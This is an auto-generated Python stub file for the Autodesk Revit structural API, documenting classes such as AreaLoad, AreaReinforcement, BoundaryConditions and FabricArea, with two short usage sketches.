LoadCategoryName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The name of the category to which this load belongs. Get: LoadCategoryName(self: LoadBase) -> str """ LoadNatureName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A string representing the nature of the load. Get: LoadNatureName(self: LoadBase) -> str """ OrientTo = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load orientation option. Get: OrientTo(self: LoadBase) -> LoadOrientTo Set: OrientTo(self: LoadBase) = value """ WorkPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Id of the work plane which may determine the orientation of the load. Get: WorkPlaneId(self: LoadBase) -> ElementId """ class AreaLoad(LoadBase, IDisposable): """ An object that represents a force applied across an area. """ @staticmethod def Create(aDoc, *__args): """ Create(aDoc: Document, host: AnalyticalModelSurface, forceVector: XYZ, symbol: AreaLoadType) -> AreaLoad Creates a new hosted area load within the project. aDoc: Document to which new area load will be added. host: The analytical surface host element (Analytical Floor, Analytical Foundation Slab or Analytical Wall) for the area Load. forceVector: The force vector applied to the 1st reference point of the area load. symbol: The symbol of the AreaLoad. Set ll to use default type. Returns: If successful, returns an object of the newly created AreaLoad. ll is returned if the operation fails. 
Create(aDoc: Document, loops: IList[CurveLoop], forceVector: XYZ, symbol: AreaLoadType) -> AreaLoad Create(aDoc: Document, loops: IList[CurveLoop], forceVectors: IList[XYZ], refPointCurveIndexes: IList[int], refPointCurveSelectors: IList[int], symbol: AreaLoadType) -> AreaLoad """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetLoops(self): """ GetLoops(self: AreaLoad) -> IList[CurveLoop] Returns curve loops that define geometry of the area load. """ pass def GetRefPoint(self, index): """ GetRefPoint(self: AreaLoad, index: int) -> XYZ Returns the physical location of the reference point. index: The index of the point to return. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetLoops(self, doc, newLoops): """ SetLoops(self: AreaLoad, doc: Document, newLoops: IList[CurveLoop]) -> bool """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass Area = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns area of the area load. Get: Area(self: AreaLoad) -> float """ ForceVector1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the 1st reference point of the area load, oriented according to OrientTo setting. Get: ForceVector1(self: AreaLoad) -> XYZ Set: ForceVector1(self: AreaLoad) = value """ ForceVector2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the 2nd reference point of the area load, oriented according to OrientTo setting. Get: ForceVector2(self: AreaLoad) -> XYZ Set: ForceVector2(self: AreaLoad) = value """ ForceVector3 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the 3rd reference point of the area load, oriented according to OrientTo setting. Get: ForceVector3(self: AreaLoad) -> XYZ Set: ForceVector3(self: AreaLoad) = value """ IsProjected = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load is projected. Get: IsProjected(self: AreaLoad) -> bool Set: IsProjected(self: AreaLoad) = value """ NumRefPoints = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the total number of reference points for the area load. Get: NumRefPoints(self: AreaLoad) -> int """ class LoadTypeBase(ElementType, IDisposable): """ An object that represents a Load type. 
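# --- Usage sketch (illustrative example, not part of the generated stubs) ---
# Creates a hosted AreaLoad on an analytical surface using the Create()
# overload documented above, then reads back a few LoadBase/AreaLoad
# properties.  Assumptions: `doc` is the active Document and `surface_host`
# is an AnalyticalModelSurface (Analytical Floor, Foundation Slab or Wall);
# passing None for the symbol requests the default AreaLoadType, as noted in
# the Create() documentation.  The force vector is in Revit internal units.
def _example_create_area_load(doc, surface_host):
    from Autodesk.Revit.DB import Transaction, XYZ
    from Autodesk.Revit.DB.Structure import AreaLoad
    t = Transaction(doc, "Create area load")
    t.Start()
    load = AreaLoad.Create(doc, surface_host, XYZ(0, 0, -1000.0), None)
    t.Commit()
    if load is not None:
        print("area:", load.Area, "ref points:", load.NumRefPoints,
              "hosted:", load.IsHosted, "load case:", load.LoadCaseName)
    return load
# ---------------------------------------------------------------------------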
""" def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class AreaLoadType(LoadTypeBase, IDisposable): """ An object that represents a Load type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class AreaReinforcement(Element, IDisposable): """ An object that represents an Area Reinforcement within the Autodesk Revit project. """ @staticmethod def Create(document, hostElement, *__args): """ Create(document: Document, hostElement: Element, curveArray: IList[Curve], majorDirection: XYZ, areaReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, rebarHookTypeId: ElementId) -> AreaReinforcement Create(document: Document, hostElement: Element, majorDirection: XYZ, areaReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, rebarHookTypeId: ElementId) -> AreaReinforcement Creates a new AreaReinforcement object based on a host boundary. document: The document. hostElement: The element that will host the AreaReinforcement. The host can be a Structural Floor, Structural Wall, Structural Slab, or a Part created from a structural layer belonging to one of those element types. majorDirection: A vector to define the major direction of the AreaReinforcement. areaReinforcementTypeId: The id of the AreaReinforcementType. rebarBarTypeId: The id of the RebarBarType. rebarHookTypeId: The id of the RebarHookType. If this parameter is InvalidElementId, it means to create a rebar with no hooks. Returns: The newly created AreaReinforcement. 
""" pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBoundaryCurveIds(self): """ GetBoundaryCurveIds(self: AreaReinforcement) -> IList[ElementId] Retrieves the set of curves forming the boundary of the Area Reinforcement. Returns: A collection of ElementIds of AreaReinforcementCurve elements. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHostId(self): """ GetHostId(self: AreaReinforcement) -> ElementId The element that contains the Area Reinforcement. Returns: The element that the Area Reinforcement object belongs to, such as a structural wall, floor or foundation. """ pass def GetRebarInSystemIds(self): """ GetRebarInSystemIds(self: AreaReinforcement) -> IList[ElementId] Returns the ids of the RebarInSystem elements owned by the AreaReinforcement element. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: AreaReinforcement, view: View3D) -> bool Checks if this Area Reinforcement is shown solidly in a 3D view. view: The 3D view element Returns: True if Area Reinforcement is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: AreaReinforcement, view: View) -> bool Checks if Area Reinforcement is shown unobscured in a view. view: The view element Returns: True if Area Reinforcement is shown unobscured, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass @staticmethod def RemoveAreaReinforcementSystem(doc, system): """ RemoveAreaReinforcementSystem(doc: Document, system: AreaReinforcement) -> IList[ElementId] Deletes the specified AreaReinforcement, and converts its RebarInSystem elements to equivalent Rebar elements. doc: The document. system: An AreaReinforcement element in the document. Returns: The ids of the newly created Rebar elements. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: AreaReinforcement, view: View3D, solid: bool) Sets this Area Reinforcement to be shown solidly in a 3D view. view: The 3D view element solid: True if Area Reinforcement is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: AreaReinforcement, view: View, unobscured: bool) Sets Area Reinforcement to be shown unobscured in a view. view: The view element unobscured: True if Area Reinforcement is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AdditionalBottomCoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Additional offset from the bottom or interior cover reference. 
Get: AdditionalBottomCoverOffset(self: AreaReinforcement) -> float Set: AdditionalBottomCoverOffset(self: AreaReinforcement) = value """ AdditionalTopCoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Additional offset from the top or exterior cover reference. Get: AdditionalTopCoverOffset(self: AreaReinforcement) -> float Set: AdditionalTopCoverOffset(self: AreaReinforcement) = value """ AreaReinforcementType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieves the type of the Area Reinforcement. Get: AreaReinforcementType(self: AreaReinforcement) -> AreaReinforcementType """ Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieves the Major Direction of the Area Reinforcement. Get: Direction(self: AreaReinforcement) -> XYZ """ class AreaReinforcementCurve(CurveElement, IDisposable): """ An object that represents a single curve forming part of the boundary of an Area Reinforcement element in Autodesk Revit. """ def Dispose(self): """ Dispose(self: AreaReinforcementCurve, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass Curve = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the 3D curve forming part of the boundary of an Area Reinforcement element. Get: Curve(self: AreaReinforcementCurve) -> Curve """ class AreaReinforcementType(ElementType, IDisposable): """ An object that specifies the type of a Structural Area Reinforcement element in Autodesk Revit. """ @staticmethod def CreateDefaultAreaReinforcementType(aDoc): """ CreateDefaultAreaReinforcementType(aDoc: Document) -> ElementId Creates a new AreaReinforcementType object with a default name. aDoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) 
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class BentFabricBendDirection(Enum, IComparable, IFormattable, IConvertible): """ Direction in which FabricSheet is bent. enum BentFabricBendDirection, values: Major (0), Minor (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Major = None Minor = None value__ = None class BentFabricStraightWiresLocation(Enum, IComparable, IFormattable, IConvertible): """ Bent Fabric straight wires location. The side on which straight wires will be located is determined by the start and end point of the first bent profile segment that specifies the direction of the curve loop on plane. enum BentFabricStraightWiresLocation, values: Left (1), Right (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Left = None Right = None value__ = None class BentFabricWiresOrientation(Enum, IComparable, IFormattable, IConvertible): """ Bent Fabric wires orientation. enum BentFabricWiresOrientation, values: Down (0), Up (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Down = None Up = None value__ = None class BoundaryConditions(Element, IDisposable): """ An object that represents a boundary condition (a point, line, or area support) applied to the analytical model within the Autodesk Revit project. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBoundaryConditionsType(self): """ GetBoundaryConditionsType(self: BoundaryConditions) -> BoundaryConditionsType Returns the boundary conditions type. Returns: The boundary conditions type. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurve(self): """ GetCurve(self: BoundaryConditions) -> Curve Returns the curve that defines the geometry of the line boundary conditions. """ pass def GetDegreesOfFreedomCoordinateSystem(self): """ GetDegreesOfFreedomCoordinateSystem(self: BoundaryConditions) -> Transform Gets the origin and rotation of the coordinate system that is used by translation and rotation parameters, like X Translation or Z Rotation. Returns: The coordinate system. Origin contains the position of the start of the boundary conditions. BasisX, BasisY and BasisZ contain the directions of the axes in the global coordinate system. """ pass def GetLoops(self): """ GetLoops(self: BoundaryConditions) -> IList[CurveLoop] Returns the curve loops that define the geometry of the area boundary conditions. Returns: The curve loop collection. """ pass def GetOrientTo(self): """ GetOrientTo(self: BoundaryConditions) -> BoundaryConditionsOrientTo Returns the boundary conditions orientation option. Returns: The orientation option. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetOrientTo(self, orientTo): """ SetOrientTo(self: BoundaryConditions, orientTo: BoundaryConditionsOrientTo) Sets the boundary condition orientation option. orientTo: The new orientation option. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AssociatedLoadId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Id of the internal load element associated with the boundary conditions. Get: AssociatedLoadId(self: BoundaryConditions) -> ElementId Set: AssociatedLoadId(self: BoundaryConditions) = value """ HostElement = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element for the boundary conditions. 
Get: HostElement(self: BoundaryConditions) -> AnalyticalModel """ HostElementId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element Id for the boundary conditions. Get: HostElementId(self: BoundaryConditions) -> ElementId """ Point = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the position of point boundary conditions. Get: Point(self: BoundaryConditions) -> XYZ """ class BoundaryConditionsOrientTo(Enum, IComparable, IFormattable, IConvertible): """ Specifies boundary condition orientation. enum BoundaryConditionsOrientTo, values: HostLocalCoordinateSystem (1), Project (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass HostLocalCoordinateSystem = None Project = None value__ = None class BoundaryConditionsType(Enum, IComparable, IFormattable, IConvertible): """ This enum declares type of BoundaryConditions. enum BoundaryConditionsType, values: Area (2), Line (1), Point (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Area = None Line = None Point = None value__ = None class BracePlanRepresentation(Enum, IComparable, IFormattable, IConvertible): """ The possible representations for braces in plan views. enum BracePlanRepresentation, values: LineWithAngle (2), ParallelLine (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
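# Usage sketch (not part of the generated stubs): inspecting every BoundaryConditions
# element in the model and reporting its geometry according to BoundaryConditionsType,
# using only the accessors documented above. Assumes `doc` is the active Document.
import clr
clr.AddReference("RevitAPI")
from Autodesk.Revit.DB import FilteredElementCollector
from Autodesk.Revit.DB.Structure import BoundaryConditions, BoundaryConditionsType

for bc in FilteredElementCollector(doc).OfClass(BoundaryConditions):
    bc_type = bc.GetBoundaryConditionsType()
    if bc_type == BoundaryConditionsType.Point:
        print("point support at", bc.Point)
    elif bc_type == BoundaryConditionsType.Line:
        print("line support, length =", bc.GetCurve().Length)
    else:  # BoundaryConditionsType.Area
        print("area support with", bc.GetLoops().Count, "boundary loop(s)")
    print("  oriented to:", bc.GetOrientTo())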
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass LineWithAngle = None ParallelLine = None value__ = None class CodeCheckingParameterServiceData(object, IDisposable): """ The data needed by code checking server to perform code checking. """ def Dispose(self): """ Dispose(self: CodeCheckingParameterServiceData) """ pass def GetCurrentElements(self): """ GetCurrentElements(self: CodeCheckingParameterServiceData) -> IList[ElementId] Returns the list of Ids of the current elements. Returns: Ids of the current elements. Contains the analytical model element to which the code checking parameter belongs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: CodeCheckingParameterServiceData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Document = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The current document. Get: Document(self: CodeCheckingParameterServiceData) -> Document """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: CodeCheckingParameterServiceData) -> bool """ class DistributionType(Enum, IComparable, IFormattable, IConvertible): """ The type of the distribution enum DistributionType, values: Uniform (0), VaryingLength (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Uniform = None value__ = None VaryingLength = None class EndTreatmentType(ElementType, IDisposable): """ An end treatment type object that is used to hold information about the end treatment applied to bars that are connected to a coupler. 
""" @staticmethod def Create(doc, strTreatment=None): """ Create(doc: Document) -> EndTreatmentType Creates a new EndTreatmentType in a document. Create(doc: Document, strTreatment: str) -> EndTreatmentType Creates a new EndTreatmentType in a document and adds the input string to the endTreatment parameter. """ pass @staticmethod def CreateDefaultEndTreatmentType(ADoc): """ CreateDefaultEndTreatmentType(ADoc: Document) -> ElementId Creates a new EndTreatmentType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass EndTreatment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """String describing the end treatment Get: EndTreatment(self: EndTreatmentType) -> str Set: EndTreatment(self: EndTreatmentType) = value """ class FabricArea(Element, IDisposable): """ An object that represents an Fabric Area Distribution within the Autodesk Revit project. It is container for Fabric Sheet elements. """ def CopyCurveLoopsInSketch(self): """ CopyCurveLoopsInSketch(self: FabricArea) -> IList[CurveLoop] Creates copies of the CurveLoops in the FabricArea sketch. Returns: The copy of the curve loops. """ pass @staticmethod def Create(aDoc, hostElement, *__args): """ Create(aDoc: Document, hostElement: Element, curveLoops: IList[CurveLoop], majorDirection: XYZ, majorDirectionOrigin: XYZ, fabricAreaTypeId: ElementId, fabricSheetTypeId: ElementId) -> FabricArea Create(aDoc: Document, hostElement: Element, majorDirection: XYZ, fabricAreaTypeId: ElementId, fabricSheetTypeId: ElementId) -> FabricArea Creates a FabricArea based on a host boundary. aDoc: The document. hostElement: The element that will host the FabricArea. The host can be a Structural Floor, Structural Wall, Structural Slab, or a Part created from a structural layer belonging to one of those element types. majorDirection: A vector to define the major direction of the FabricArea. fabricAreaTypeId: The id of the FabricAreaType. fabricSheetTypeId: The id of the FabricSheetType. Returns: The newly created FabricArea. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBoundaryCurveIds(self): """ GetBoundaryCurveIds(self: FabricArea) -> IList[ElementId] Retrieves the identifiers of the set of curves forming the boundary of the Fabric Area. Returns: A collection of ElementIds of FabricAreaCurve elements. 
""" pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetFabricSheetElementIds(self): """ GetFabricSheetElementIds(self: FabricArea) -> IList[ElementId] Retrieves the identifiers of all the FabricSheet Elements in the FabricArea. Returns: A collection of ElementIds of FabricSheet elements. """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: FabricArea) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def GetTotalSheetMass(self): """ GetTotalSheetMass(self: FabricArea) -> float Calculates the total sheet mass: Volume of Wire * Unit Weight. Returns: The total sheet mass. """ pass def GetValidViewsForTags(self): """ GetValidViewsForTags(self: FabricArea) -> IList[ElementId] Gets ids of the views where tags and symbols can be placed for the FabricArea and/or FabricSheets Returns: The collection of View ElementIds. """ pass def IsCoverOffsetValid(self, coverOffset): """ IsCoverOffsetValid(self: FabricArea, coverOffset: float) -> bool Identifies if the specified value is valid for use as a cover offset. coverOffset: The cover offset value. Returns: True if the value is valid, false if the value is invalid. """ pass def IsValidMajorLapSplice(self, majorLapSplice): """ IsValidMajorLapSplice(self: FabricArea, majorLapSplice: float) -> bool Identifies if the specified value is valid for use as a major lap splice. majorLapSplice: The major lap splice value. Returns: True if the value is valid, false if the value is invalid. """ pass def IsValidMinorLapSplice(self, minorLapSplice): """ IsValidMinorLapSplice(self: FabricArea, minorLapSplice: float) -> bool Identifies if the specified value is valid for use as a minor lap splice. minorLapSplice: The minor lap splice value. Returns: True if the value is valid, false if the value is invalid. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass @staticmethod def RemoveFabricReinforcementSystem(doc, system): """ RemoveFabricReinforcementSystem(doc: Document, system: FabricArea) -> IList[ElementId] Deletes the specified FabricArea, and converts its FabricSheet elements to equivalent Single Fabric Sheet elements. 